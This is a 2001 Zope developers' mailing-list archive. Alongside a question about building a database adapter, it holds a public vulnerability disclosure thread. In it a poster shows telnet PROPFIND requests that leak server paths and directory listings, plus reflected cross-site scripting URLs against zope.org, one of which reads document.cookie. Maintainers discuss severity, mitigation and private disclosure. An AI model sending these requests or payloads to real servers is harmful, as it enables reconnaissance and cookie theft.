[Zope-dev] questions about writing a DA

2001-09-23 Thread StevenLee 

hi,all

I have got several questions here,and maybe you can give me some advice.

What I am trying to do  is write a product which can communicate with ODBC Socket 
Server,
a win32 server application that allow applications to have access to Data Sources 
managed by Windows ODBC 
DataSource Administrator. And now a class written in python can communicate with ODBC 
Socket Server.
BTW,the class mentioned above  handles the connection to the server,sending SQL 
statement,and Receiving results.

As far as I know, in Zope,to access Data Sources,one must create a Database connection 
and  
ZSQLMethods associated with it to get the results. (but I have doubt about this,
IMHO,there must be some other way to do so,but what is it.).

Now,I am rather confused about how to solve the problem. 
First,is what I need to write a DA? or just a common product?
Second,if it's a DA, how can I use the existing class? I have read the article named 
how to write a DA in the how-tos,but it is quite abstract to me. 
Third,where can I find more about the DataBase Connection and ZSQLMethod ? especially 
on how they work together to access databases.

OK,I am not sure whether I have made me understood, in fact,I am not quite clear 
myself. if you have any questions about that,I will reply ASAP.

thanks for your great patience,I will be grateful if you can give me some advice.
thank you!

Best Wishes

yours sincerely
Steven Lee  
fŠ^
ëæj)eŠËY¢—ƒzüè¥ê+‚m§ÿåŠËlΊ^¢¸?™¨¥™©ÿ–+-Šwèÿ:)yׯ6‡+¢Ë)¢Ël¢±Ó0·§r‡bž^•«^vX¬¶Èm¶Ÿÿ–+-³:)zŠàþf¢–f§þX¬¶)ߣüè¥æ§ž‹§qèm¶Ÿÿ–+-³:)zŠàþf¢–f§þX¬¶)ߣüè¥

[Zope-dev] Vulnerability in Zope

2001-09-23 Thread ALife 

Found vulnerability: retrieve a full path to local files in Zope.

---[ Example 1 (Linux):

telnet www.zope.org 80

PROPFIND / HTTP/1.0

F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
 type=text/css   /HEAD   BODY B
Bobo-Exception-Line: 369


...


 !--
 Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/l
ib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/ba
se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
   F
ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i
n zpublisher_exception_hook
   (Object: ApplicationDefaultPermissions)
File /us
r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in
publish
 File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p
y, line 160, in mapply
  (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-mo
dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
 (Object: PR
OPFIND)
 File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py,
 line 222, in PROPFIND
  (Object: ApplicationDefaultPermissions)
   File /usr/loc
al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  Fi
le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i
n apply
 File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py,
line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d
avcmds.py, line 219, in apply
   File /usr/local/base/Zope-2.3.2-modified/lib/pyth
on/webdav/davcmds.py, line 175, in apply
  File /usr/local/base/Zope-2.3.2-modifi
ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
  (Object: Virtu
al)
   TypeError: (see above)

 --
Host has closed connection.

---[ Example 2 (Linux):
telnet www.zope.com 80

 / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0


HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H
TTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
 type=text/css   /HEAD   BODY B
Content-Length: 5845
Bobo-Exception-Line: 547

 ... 

 !--
 Traceback (innermost last):
  File /
usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i
n publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher
/Publish.py, line 187, in publish
   File /usr/local/base/Zope-2.3.2-modified/lib/
python/Zope/__init__.py, line 221, in zpublisher_exception_hook
   (Object: Appl
icationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/
ZPublisher/Publish.py, line 173, in publish
 File /usr/local/base/Zope-2.3.2-mod
ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
   File /usr/loc

Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Paul Everitt 


Do others consider this a vulnerability?  While it reveals more 
information than people might want, I'm curious about scenarios under 
which it could be exploited.

If any of you know of something *specific*, meaning it's a genuinely 
exploitable vulnerability, please email me or Brian Lloyd 
([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.

--Paul

ALife wrote:

 Found vulnerability: retrieve a full path to local files in Zope.
 
 ---[ Example 1 (Linux):
 
 telnet www.zope.org 80
 
 PROPFIND / HTTP/1.0
 
 F
 G
 H
 J
 K
 L
 HTTP/1.0 500 Internal Server Error
 Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
 Date: Mon, 10 Sep 2001 15:38:59 GMT
 Content-Length: 7058
 Ms-Author-Via: DAV
 Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
 Sheets.py
 Bobo-Exception-Type: TypeError
 Content-Length: 7058
 Ms-Author-Via: DAV
 Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
 Sheets.py
 Bobo-Exception-Type: TypeError
 Content-Type: text/html
 Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
 EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
 to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
  type=text/css   /HEAD   BODY B
 Bobo-Exception-Line: 369
 
 
 ...
 
 
  !--
  Traceback (innermost last):
   File /usr/local/base/Zope-2.3.2-modified/l
 ib/python/ZPublisher/Publish.py, line 223, in publish_module
   File /usr/local/ba
 se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
F
 ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i
 n zpublisher_exception_hook
(Object: ApplicationDefaultPermissions)
 File /us
 r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in
 publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p
 y, line 160, in mapply
   (Object: PROPFIND)
   File /usr/local/base/Zope-2.3.2-mo
 dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
  (Object: PR
 OPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py,
  line 222, in PROPFIND
   (Object: ApplicationDefaultPermissions)
File /usr/loc
 al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
   Fi
 le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i
 n apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py,
 line 219, in apply
 File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d
 avcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/pyth
 on/webdav/davcmds.py, line 175, in apply
   File /usr/local/base/Zope-2.3.2-modifi
 ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
   (Object: Virtu
 al)
TypeError: (see above)
 
  --
 Host has closed connection.
 
 ---[ Example 2 (Linux):
 telnet www.zope.com 80
 
  / HTTP/1.0
 or NOTREALCOMMAND / HTTP/1.0
 
 
 HTTP/1.0 404 Not Found
 Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
 Date: Fri, 21 Sep 2001 12:51:48 GMT
 Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H
 TTPResponse.py
 Content-Type: text/html
 Bobo-Exception-Type: NotFound
 Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//
 EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML  HEAD  TITLEWelcome
 to Zope.org/TITLE   link rel=stylesheet href=http://www.zope.org/zope_css;
  type=text/css   /HEAD   BODY B
 Content-Length: 5845
 Bobo-Exception-Line: 547
 
  ... 
 
  !--
  Traceback (innermost last):
   File /
 usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i
 n publish_module
   File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher
 /Publish.py, line 187, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/
 python/Zope/__init__.py, line 221, in zpublisher_exception_hook

Re: [Zope-dev] questions about writing a DA

2001-09-23 Thread Paul Everitt 


I just took a look at ODBC Socket Server, which I had never seen before. 
  Pretty interesting!  Here's some comments.

1) It looks like socket server opens a new socket for processing every 
request.  In this respect, it goes against one of the benefits of 
database adapters, which keep a persistent connection.

2) Architecturally, socket server is very similar to web services.  See 
the fishbowl proposal at dev.zope.org for more info.  Thus, the approach 
that Zope would do for web services might have some similarity to what 
you'd like to do.  Alternatively, take a look at the adapter for 
Ultraseek search engine at 
http://www.zope.org/Members/brianh/UltraseekDA.  It gives a model that 
might be useful to you.

3) Zope's approach of having separate objects that handle database 
connections provide the benefit that regular objects can't just fire up 
socket connections.  You want a model that helps prevent all of Zope's 
threads from being stuck waiting on responses to socket requests.

4) SQL Methods provide some useful and important machinery for your 
socket server approach.  First, I think you want site developers to 
think your thing is exactly the same as a regular SQL Method.  Also:

   - You likely want to keep the arguments list approach, to
   prevent people from inserting malicious data into the SQL requests.

   - Even more than with current database adapters, you want to
   retain the caching feature in SQL Methods.

   - Shoving the results into the Recordset code is something
   you might want to keep.

   - Etc.

Good luck, this looks like a useful project!

--Paul

StevenLee wrote:

 hi,all
 
 I have got several questions here,and maybe you can give me some advice.
 
 What I am trying to do  is write a product which can communicate with ODBC Socket 
Server,
 a win32 server application that allow applications to have access to Data Sources 
managed by Windows ODBC 
 DataSource Administrator. And now a class written in python can communicate with 
ODBC Socket Server.
 BTW,the class mentioned above  handles the connection to the server,sending SQL 
statement,and Receiving results.
 
 As far as I know, in Zope,to access Data Sources,one must create a Database 
connection and  
 ZSQLMethods associated with it to get the results. (but I have doubt about this,
 IMHO,there must be some other way to do so,but what is it.).
 
 Now,I am rather confused about how to solve the problem. 
 First,is what I need to write a DA? or just a common product?
 Second,if it's a DA, how can I use the existing class? I have read the article named 
how to write a DA in the how-tos,but it is quite abstract to me. 
 Third,where can I find more about the DataBase Connection and ZSQLMethod ? 
especially on how they work together to access databases.
 
 OK,I am not sure whether I have made me understood, in fact,I am not quite clear 
myself. if you have any questions about that,I will reply ASAP.
 
 thanks for your great patience,I will be grateful if you can give me some advice.
 thank you!
 
 Best Wishes
 
 yours sincerely
 Steven Lee  
 f?
 
?j)e?Y+?m?^8.??+-???:)y?6?+(7))(7)l1.?r??^?^vX?+-?:)z???f?X?)?q+-?:)z???f?X?)??pe==
 




___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Jerome Alet 

On Sun, Sep 23, 2001 at 10:36:33AM -0400, Paul Everitt wrote:
 
 Do others consider this a vulnerability?  While it reveals more 
 information than people might want, I'm curious about scenarios under 
 which it could be exploited.
 
 If any of you know of something *specific*, meaning it's a genuinely 
 exploitable vulnerability, please email me or Brian Lloyd 
 ([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.
 ...
 ...
  Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property

Think about social engeniering.
Knowing this sort of things, while this is not a vulnerability in itself,
allows everybody to remotely know were Data.fs is.

bye,

Jerome Alet


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

[Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread ALife 


Example:

http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT
http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT
http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT

For  example, an attacker might post a message like

Hello message board. This is a message.
   SCRIPTmalicious code/SCRIPT
This is the end of my message.

When a victim with scripts enabled  in their  browser reads this
message,  the  malicious  code   may  be  executed   unexpectedly.
Scripting tags that can be embedded in this way include SCRIPT,
OBJECT, APPLET, and EMBED.



___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Chris Withers 

 Do others consider this a vulnerability?

Yup... especially given the hard-coded (sigh) error page returned for
authentication error gives out this information :-(

Chris



___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Chris Withers 

 Hello message board. This is a message.
SCRIPTmalicious code/SCRIPT
 This is the end of my message.

I don't really see your point other than a carelessly implemented app may
expose these kind of vulnerabilities. Python (and hence Zope) has a library
for stripping out this sort of malicious HTML.

Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this
can be used.

cheers,

Chris


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

[Zope-dev] Vulnerability: attacking can get file list and directory

2001-09-23 Thread ALife 

Vulnerability: attacking can get file list and directory
Tested on Win32 platform

Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter
enter
enter

 list files and directory 

This tested on my site:
security.instock.ru 8080


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Oliver Bleutgen 

Aargh, 
I sent that first to [EMAIL PROTECTED] ...

 Hello message board. This is a message.
SCRIPTmalicious code/SCRIPT
 This is the end of my message.

 I don't really see your point other than a carelessly implemented app may
 expose these kind of vulnerabilities. Python (and hence Zope) has a
 library
 for stripping out this sort of malicious HTML.

 Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this
 can be used.

umm chris,

you're right, but this example

http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT

executes the script. I don't exactly see why/where but I feel 
this really shouldn't happen. As I see it, it's more a problem 
of zope's standard_error page, which constructs links to the 
classic zope site. I don't see a zope-specific bug here, too.

cheers,
oliver



___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] Vulnerability in Zope

2001-09-23 Thread Andy McKay 

Haven't we been complaining about this automatic appending of tracebacks for
a while? To me this is what log files are for but Im not sure what this
guy is on. I wouldnt count this as a security vulnerability.

- Original Message -
From: Chris Withers [EMAIL PROTECTED]
To: Paul Everitt [EMAIL PROTECTED]; ALife [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, September 23, 2001 10:44 AM
Subject: Re: [Zope-dev] Vulnerability in Zope


  Do others consider this a vulnerability?

 Yup... especially given the hard-coded (sigh) error page returned for
 authentication error gives out this information :-(

 Chris



 ___
 Zope-Dev maillist  -  [EMAIL PROTECTED]
 http://lists.zope.org/mailman/listinfo/zope-dev
 **  No cross posts or HTML encoding!  **
 (Related lists -
  http://lists.zope.org/mailman/listinfo/zope-announce
  http://lists.zope.org/mailman/listinfo/zope )




___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Andy McKay 

What does this have to do with Zope? Its down to an individual application.

- Original Message - 
From: ALife [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, September 23, 2001 10:23 AM
Subject: [Zope-dev] New: Cross Site Scripting vulnerability


 
 Example:
 
 http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT
 http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT
 http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT
 
 For  example, an attacker might post a message like
 
 Hello message board. This is a message.
SCRIPTmalicious code/SCRIPT
 This is the end of my message.
 
 When a victim with scripts enabled  in their  browser reads this
 message,  the  malicious  code   may  be  executed   unexpectedly.
 Scripting tags that can be embedded in this way include SCRIPT,
 OBJECT, APPLET, and EMBED.
 
 
 
 ___
 Zope-Dev maillist  -  [EMAIL PROTECTED]
 http://lists.zope.org/mailman/listinfo/zope-dev
 **  No cross posts or HTML encoding!  **
 (Related lists - 
  http://lists.zope.org/mailman/listinfo/zope-announce
  http://lists.zope.org/mailman/listinfo/zope )
 


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] DISCUSS: Community checkins for CVS

2001-09-23 Thread Joachim Werner 

 I imagine that the group will decide rules on peer reviewing.  For
 comparison, the Mozilla group has very elaborate rules for checkins,
 while Python has pretty much an innocent until proven guilty culture.
 (That is, you check something in, and if somebody complains, it gets
 removed.)

 I don't think it is worthwhile trying to form these rules a priori.

That's fine. I just wanted to put it onto the agenda ...

  We need rules like NO FIXES BETWEEN FINAL BETA AND RELEASE (Absolutely
no
  fixes I mean) -- and those rules should apply to everybody.

 Again, we'll let the rules come out of the group.  For instance, what if
 an Emacs #foo.py# accidentally got checked in?  Would you really require
 another beta release for that?  Betas are a cost incurred by hundreds of
 people around the world.

My personal opinion is that, apart from the version number, a final beta
should be exactly the same as the actual release. Accidentally checked-in
stuff can cause accidents. So there is some reason for a careful release
policy.

But in your specific case, if the final beta that should lead to a release
has been actually released (and tagged in the CVS), how should somebody be
able to check something into it afterwards? That could only happen if there
are problems with the CVS configuration and usage I guess ...

 Ahh, the it's the Wiki's fault argument.  I just checked the zip
 mailing list archive.  9 messages since Aug 1st.  So neither email nor
 Wiki are good choices.  Can you point to an example of a process that
 worked better for designing APIs?

I don't blame the Wiki in general. Wikis (together with mailing lists) are a
good start. Sometimes we'd just need real meetings on real conferences I
guess ...

Joachim


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] New: Cross Site Scripting vulnerability

2001-09-23 Thread Martijn Pieters 

 Example:

 http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT
 http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT
 http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT

 For  example, an attacker might post a message like

 Hello message board. This is a message.
SCRIPTmalicious code/SCRIPT
 This is the end of my message.

 When a victim with scripts enabled  in their  browser reads this
 message,  the  malicious  code   may  be  executed   unexpectedly.
 Scripting tags that can be embedded in this way include SCRIPT,
 OBJECT, APPLET, and EMBED.

First of all, I would appreciate it if you could send alleged security
problems to us in private, and not advertise these on a public mailinglist.
I know that you had posted your previous ;discovery' to us in private some
time before you took it to the public lists, but the time given to us to
craft a response to your email was by far too short. One week would have
been the absolute minumum!

Secondly, could you in future also describe the exact problem in more
detail? I assume that you mean a malicious third party could in theory abuse
our server to create a page with malicious client-side code by crafting a
message on a message board or in an email, right? Your manner of posting
could suggest to others that the vulnerability lies with Zope itself, not
with browsers allowing malcious code via a generated web page.

Third, the 'classic.zope.org' link on the Zope.org error page has long been
overdue for removal, especially since classic is now down. I have removed
the auto-generated link to it.

--
Martijn Pieters
| Software Engineer  mailto:[EMAIL PROTECTED]
| Zope Corporation   http://www.zope.com/
| Creators of Zope   http://www.zope.org/
-


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] Vulnerability: attacking can get file list and directory

2001-09-23 Thread Joachim Werner 


 Vulnerability: attacking can get file list and directory
 Tested on Win32 platform

 Example:
 telnet zopeserver 8080
 PROPFIND / HTTP/1.0
 enter
 enter
 enter

  list files and directory 

 This tested on my site:
 security.instock.ru 8080

This one really seems to be the old WebDAV is not safe one. I guess it has
been tackled already. You should be able to switch the file listing off for
the Anonymous User in Zope 2.4.1 ...

Joachim


___
Zope-Dev maillist  -  [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope )